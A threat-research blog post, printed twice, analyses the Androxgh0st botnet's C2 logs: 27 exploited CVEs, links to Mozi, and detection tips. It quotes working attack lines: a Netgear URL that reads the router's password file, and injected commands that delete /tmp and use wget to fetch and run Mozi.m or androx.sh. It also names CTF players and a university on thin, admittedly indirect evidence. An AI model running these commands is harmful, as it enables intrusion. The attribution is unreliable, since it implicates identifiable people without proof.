🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
The Androxgh0st botnet, an emerging cyber threat since January 2024, has resurfaced with advanced capabilities and integration of IoT-focused Mozi payloads. Exploiting over 20 vulnerabilities in technologies like Cisco ASA, Atlassian JIRA, PHP frameworks, and IoT devices, Androxgh0st enables unauthorized access and remote code execution. Its growing sophistication includes shared infrastructure and malware persistence tactics, posing risks to global web servers and IoT networks. CloudSEK’s research highlights the botnet's operational overlap with Mozi, emphasizing the need for immediate patching and vigilant monitoring to mitigate exploitation risks.
CloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its exploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January 2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also deploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since January 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks, allowing unauthorized access and remote code execution. This clearly outlines the heightened activity from the botnet operators, as they are now focusing on a wide range of web application vulnerabilities in order to obtain initial access, in addition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access.
The Mozi botnet primarily spanned across China, India and Albania. The botnet targeted Netgear, Dasan, D-Link routers and MVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by the Chinese law enforcement. The Mozi botnet creators, or Chinese law enforcement, by forcing the cooperation of the creators - distributed an update which killed Mozi Botnet Agents’ ability to connect to the outside world, leaving only a small fraction of working bots standing.
During our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi.
Now that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of web requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet.
CloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access.
1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
File Upload Form:
Appends Code to PHP Files:
This appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more persistent presence or further backdooring the application.
2. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
3. Metabase GeoJSON map local file inclusion Versions x.40.0-x.40.4(CVE-2021-41277): A local file inclusion vulnerability exists in Metabase due to a security issue present in GeoJSON map support that leads to a local file inclusion vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables.
4. Sophos Authentication bypass vulnerability leads to RCE(CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code.
5. Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, can be exploited in order to gain remote code execution as the oracle user.
6. OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated):
7. PHP CGI argument Injection: (CVE-2024-4577): An argument injection issue in PHP-CGI.
It is not common for botnets to append a string at the end of a web request, in this case, “PWN_IT”, which indicates a triggered action.
8. TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale.
9. GeoServer RCE Vulnerability(CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions.
10. WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution:
11. Wordpress Bruteforce Attacks: The botnet cycles through common administrative usernames and uses a consistent password pattern.The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings.
12. Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers:http://<target-ip-address>/setup.cgi?currentsetting.htm=1.Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL:
http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1
An attacker can replace the command with the command they want to run.
Now, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old vulnerability. We can also see what the injected commands are.
Injected Commands:
cmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear
The command sequence is as follows:
The downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to a network of compromised devices.
13. Unauthenticated Command Execution on GPON routers(CVE-2018-10561, CVE-2018-10562):
CVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically require login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access.
CVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed by revisiting /diag.html, allowing commands to be executed and their output retrieved.
14. Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (CVE-2022-22947) - Applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.
15. ZenTao CMS - SQL Injection (CNVD-2022-42853) - Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
16. AJ-Report Authentication Bypass and Remote Code Execution Vulnerability (CNVD-2024-15077) - The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. A remote unauthenticated attacker can compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
17. eYouMail - Remote Code Execution (CNVD-2021-26422) - eYouMail is susceptible to a remote code execution vulnerability.
18. Leadsec VPN - Arbitrary File Read (CNVD-2021-64035) - An information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., can be exploited by an attacker to read sensitive information from arbitrary files located on the file system of the server.
19. EduSoho Arbitrary File Read Vulnerability - There is an unauthorized arbitrary file reading vulnerability in the classroom-course-statistics interface of the education and training system. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain the secret value and database account password saved in the file. Sensitive information. After getting the secret value, threat actors can further use it. It is important to note that this technology is predominantly used by the Chinese.
20. UFIDA NC BeanShell Remote Code Execution (CNVD-2021-30167) - An attacker can exploit this vulnerability to remotely execute code without authorization. It is important to note that this technology is predominantly used by the Chinese.
21. OA E-Cology LoginSSO.jsp SQL Injection (CNVD-2021-33202) - e-cology is an OA office system(used predominantly in China) specially produced for large and medium-sized enterprises that supports simultaneous office work on PC, mobile and WeChat terminals. An attacker could exploit this SQL injection vulnerability to obtain sensitive information.
22. ShopXO Download arbitrary file reading vulnerability (CNVD-2021-15822) - Shopxo is an open source enterprise level open source e-commerce system used predominantly in China. Shopxo has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information.
23. Weaver OA XmlRpcServlet - Arbitrary File Read (CNVD-2022-43245) - e-office is a standard collaborative mobile office platform predominantly used in China. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
24. Ruijie Smartweb Weak Password - Ruijie smartweb management system (predominantly used in China) opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest) .
25. Hongjing HCM SQL injection vulnerability (CNVD-2023-08743) - An SQL injection vulnerability exists in Hongjing Human Resource Management System, using which attackers can obtain sensitive database information.
26. E-Cology V9 - SQL Injection (CNVD-2023-12632) - Ecology9 is a collaborative office system created by Panmicro for medium and large organizations. It is used predominantly in China. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
27. Ruckus Wireless Admin through 10.4 (CVE-2023-25717) - Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. Androxgh0st checks if the network device is running with default credentials, and if so, it pings the IP address 45.221.98[.]117.
Mozi Payload as a Component of Androxgh0st:
Unified Command Infrastructure:
TRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi Botnet.
Both botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs.
The number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over 500 devices have been infected.
Let’s take a closer look at the Ruckus Wireless Admin (CVE-2023-25717) exploitation by the botnet.
A reverse IP lookup on the IP address reveals two domains:
Upon looking at the passive DNS history of mgn4[.]com, we see that the domain has been rotated across multiple IP addresses from the same subnet mask since July 2023.
This indicates that the threat group was involved in malicious activities using the domain name at least since July 2023. Upon inspecting the communicating files with this domain, we found a malicious excel with the filename containing mandarin characters. This phishing bait, first seen in the wild in July 2023, was used by the threat actors to target a hospital in Hong Kong. The file name translates to “Kwai Chung Hospital DO16191.xlsx”.(md5: 039987db7dc1dea01547e0f3066f8d5d)
Coming back to the PHP command injection vulnerability, we noticed an uncommon string in the payload. As explained previously, by prepending and appending, the attacker ensures their malicious file is executed every time a PHP script runs. The string “PWN_IT” is likely an indicator/flag used as a persistence mechanism, and we can ascertain with high confidence that it is something that the threat actor(s) have named themselves.
A simple search led us to a “CTF-team” called “pwn_it”, led by user “ChenSem”.
These CTFs are hosted by “Kanxue”. Kanxue is a Chinese “developer” community, focused on “security research” and “reverse engineering” of PC, mobile, and smart devices. We can see the logo of China’s State Council on their website.
Now, this definitely piqued our interest as it's not uncommon for CTFs held in China to hack real world targets. Recent examples have shown that CTF organizers often need the students to sign a document agreeing to several unusual terms, aimed at keeping such operations covert. Here’s what we observed:
1. The latest CTF played by “pwn_it” on Kanxue was in 2020, even though “ChenSem” appears to be a heavy-duty CTF player, indicated by their score of 501. Interestingly, that was around the same time the world saw heightened Mozi Botnet activity in the wild.
2. The CTF hosted by Kanxue in 2024 started in August, which is around the same time when Androxgh0st TP-link exploitation was observed in the wild.
3. “Pwn_it” has also been used as a function within the source code on multiple occasions. We noticed blogs by “V1ct0r” who has written over 90 articles on security research and reverse engineering.
Their online portfolio is hosted on Github (gdufs-king.github[.]io), with Mandarin as the default language. GDUFS refers to the Guangdong University of Foreign Studies, implying that the author most-likely used to be a student at a Chinese university. While there is no direct relationship established between this CTF team and the botnet, we have certainly observed that the usage of the “pwn_it” string within malware and web requests, is popular within this CTF team.
Example log entries to watch for:
GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx
POST /wp-login.php HTTP/1.1 log=admin&pwd=Passnext%40123456
Androxgh0st may execute commands such as:
/tmp/androx
cat /etc/rc.local
cat /etc/cron.d/*
ls -la /var/tmp
Check:
cat ~/.ssh/authorized_keys
Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts.
Request Logger and Command Sender - Androxgh0st
TP Link Router Exploitation - Download servers
Geoserver Exploitation - Download servers
Netgear Router Exploitation - Download server
GPON Router Exploitation - Download server
Ruckus Wireless Admin (CVE-2023-25717)
File Hashes - Androxgh0st TP-Link Exploitation (md5)
File Hashes - Androxgh0st Geoserver Exploitation (md5)
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
24
min read
The Androxgh0st botnet, an emerging cyber threat since January 2024, has resurfaced with advanced capabilities and integration of IoT-focused Mozi payloads. Exploiting over 20 vulnerabilities in technologies like Cisco ASA, Atlassian JIRA, PHP frameworks, and IoT devices, Androxgh0st enables unauthorized access and remote code execution. Its growing sophistication includes shared infrastructure and malware persistence tactics, posing risks to global web servers and IoT networks. CloudSEK’s research highlights the botnet's operational overlap with Mozi, emphasizing the need for immediate patching and vigilant monitoring to mitigate exploitation risks.
CloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its exploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January 2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also deploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since January 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks, allowing unauthorized access and remote code execution. This clearly outlines the heightened activity from the botnet operators, as they are now focusing on a wide range of web application vulnerabilities in order to obtain initial access, in addition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access.
The Mozi botnet primarily spanned across China, India and Albania. The botnet targeted Netgear, Dasan, D-Link routers and MVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by the Chinese law enforcement. The Mozi botnet creators, or Chinese law enforcement, by forcing the cooperation of the creators - distributed an update which killed Mozi Botnet Agents’ ability to connect to the outside world, leaving only a small fraction of working bots standing.
During our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi.
Now that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of web requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet.
CloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access.
1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
File Upload Form:
Appends Code to PHP Files:
This appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more persistent presence or further backdooring the application.
2. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
3. Metabase GeoJSON map local file inclusion Versions x.40.0-x.40.4(CVE-2021-41277): A local file inclusion vulnerability exists in Metabase due to a security issue present in GeoJSON map support that leads to a local file inclusion vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables.
4. Sophos Authentication bypass vulnerability leads to RCE(CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code.
5. Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, can be exploited in order to gain remote code execution as the oracle user.
6. OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated):
7. PHP CGI argument Injection: (CVE-2024-4577): An argument injection issue in PHP-CGI.
It is not common for botnets to append a string at the end of a web request, in this case, “PWN_IT”, which indicates a triggered action.
8. TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale.
9. GeoServer RCE Vulnerability(CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions.
10. WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution:
11. Wordpress Bruteforce Attacks: The botnet cycles through common administrative usernames and uses a consistent password pattern.The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings.
12. Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers:http://<target-ip-address>/setup.cgi?currentsetting.htm=1.Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL:
http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1
An attacker can replace the command with the command they want to run.
Now, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old vulnerability. We can also see what the injected commands are.
Injected Commands:
cmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear
The command sequence is as follows:
The downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to a network of compromised devices.
13. Unauthenticated Command Execution on GPON routers(CVE-2018-10561, CVE-2018-10562):
CVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically require login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access.
CVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed by revisiting /diag.html, allowing commands to be executed and their output retrieved.
14. Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (CVE-2022-22947) - Applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.
15. ZenTao CMS - SQL Injection (CNVD-2022-42853) - Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
16. AJ-Report Authentication Bypass and Remote Code Execution Vulnerability (CNVD-2024-15077) - The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. A remote unauthenticated attacker can compromise the server to steal confidential information, install ransomware, or pivot to the internal network.
17. eYouMail - Remote Code Execution (CNVD-2021-26422) - eYouMail is susceptible to a remote code execution vulnerability.
18. Leadsec VPN - Arbitrary File Read (CNVD-2021-64035) - An information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., can be exploited by an attacker to read sensitive information from arbitrary files located on the file system of the server.
19. EduSoho Arbitrary File Read Vulnerability - There is an unauthorized arbitrary file reading vulnerability in the classroom-course-statistics interface of the education and training system. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain the secret value and database account password saved in the file. Sensitive information. After getting the secret value, threat actors can further use it. It is important to note that this technology is predominantly used by the Chinese.
20. UFIDA NC BeanShell Remote Code Execution (CNVD-2021-30167) - An attacker can exploit this vulnerability to remotely execute code without authorization. It is important to note that this technology is predominantly used by the Chinese.
21. OA E-Cology LoginSSO.jsp SQL Injection (CNVD-2021-33202) - e-cology is an OA office system(used predominantly in China) specially produced for large and medium-sized enterprises that supports simultaneous office work on PC, mobile and WeChat terminals. An attacker could exploit this SQL injection vulnerability to obtain sensitive information.
22. ShopXO Download arbitrary file reading vulnerability (CNVD-2021-15822) - Shopxo is an open source enterprise level open source e-commerce system used predominantly in China. Shopxo has an arbitrary file read vulnerability that an attacker can use to obtain sensitive information.
23. Weaver OA XmlRpcServlet - Arbitrary File Read (CNVD-2022-43245) - e-office is a standard collaborative mobile office platform predominantly used in China. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
24. Ruijie Smartweb Weak Password - Ruijie smartweb management system (predominantly used in China) opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest) .
25. Hongjing HCM SQL injection vulnerability (CNVD-2023-08743) - An SQL injection vulnerability exists in Hongjing Human Resource Management System, using which attackers can obtain sensitive database information.
26. E-Cology V9 - SQL Injection (CNVD-2023-12632) - Ecology9 is a collaborative office system created by Panmicro for medium and large organizations. It is used predominantly in China. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
27. Ruckus Wireless Admin through 10.4 (CVE-2023-25717) - Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. Androxgh0st checks if the network device is running with default credentials, and if so, it pings the IP address 45.221.98[.]117.
Mozi Payload as a Component of Androxgh0st:
Unified Command Infrastructure:
TRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi Botnet.
Both botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs.
The number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over 500 devices have been infected.
Let’s take a closer look at the Ruckus Wireless Admin (CVE-2023-25717) exploitation by the botnet.
A reverse IP lookup on the IP address reveals two domains:
Upon looking at the passive DNS history of mgn4[.]com, we see that the domain has been rotated across multiple IP addresses from the same subnet mask since July 2023.
This indicates that the threat group was involved in malicious activities using the domain name at least since July 2023. Upon inspecting the communicating files with this domain, we found a malicious excel with the filename containing mandarin characters. This phishing bait, first seen in the wild in July 2023, was used by the threat actors to target a hospital in Hong Kong. The file name translates to “Kwai Chung Hospital DO16191.xlsx”.(md5: 039987db7dc1dea01547e0f3066f8d5d)
Coming back to the PHP command injection vulnerability, we noticed an uncommon string in the payload. As explained previously, by prepending and appending, the attacker ensures their malicious file is executed every time a PHP script runs. The string “PWN_IT” is likely an indicator/flag used as a persistence mechanism, and we can ascertain with high confidence that it is something that the threat actor(s) have named themselves.
A simple search led us to a “CTF-team” called “pwn_it”, led by user “ChenSem”.
These CTFs are hosted by “Kanxue”. Kanxue is a Chinese “developer” community, focused on “security research” and “reverse engineering” of PC, mobile, and smart devices. We can see the logo of China’s State Council on their website.
Now, this definitely piqued our interest as it's not uncommon for CTFs held in China to hack real world targets. Recent examples have shown that CTF organizers often need the students to sign a document agreeing to several unusual terms, aimed at keeping such operations covert. Here’s what we observed:
1. The latest CTF played by “pwn_it” on Kanxue was in 2020, even though “ChenSem” appears to be a heavy-duty CTF player, indicated by their score of 501. Interestingly, that was around the same time the world saw heightened Mozi Botnet activity in the wild.
2. The CTF hosted by Kanxue in 2024 started in August, which is around the same time when Androxgh0st TP-link exploitation was observed in the wild.
3. “Pwn_it” has also been used as a function within the source code on multiple occasions. We noticed blogs by “V1ct0r” who has written over 90 articles on security research and reverse engineering.
Their online portfolio is hosted on Github (gdufs-king.github[.]io), with Mandarin as the default language. GDUFS refers to the Guangdong University of Foreign Studies, implying that the author most-likely used to be a student at a Chinese university. While there is no direct relationship established between this CTF team and the botnet, we have certainly observed that the usage of the “pwn_it” string within malware and web requests, is popular within this CTF team.
Example log entries to watch for:
GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx
POST /wp-login.php HTTP/1.1 log=admin&pwd=Passnext%40123456
Androxgh0st may execute commands such as:
/tmp/androx
cat /etc/rc.local
cat /etc/cron.d/*
ls -la /var/tmp
Check:
cat ~/.ssh/authorized_keys
Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts.
Request Logger and Command Sender - Androxgh0st
TP Link Router Exploitation - Download servers
Geoserver Exploitation - Download servers
Netgear Router Exploitation - Download server
GPON Router Exploitation - Download server
Ruckus Wireless Admin (CVE-2023-25717)
File Hashes - Androxgh0st TP-Link Exploitation (md5)
File Hashes - Androxgh0st Geoserver Exploitation (md5)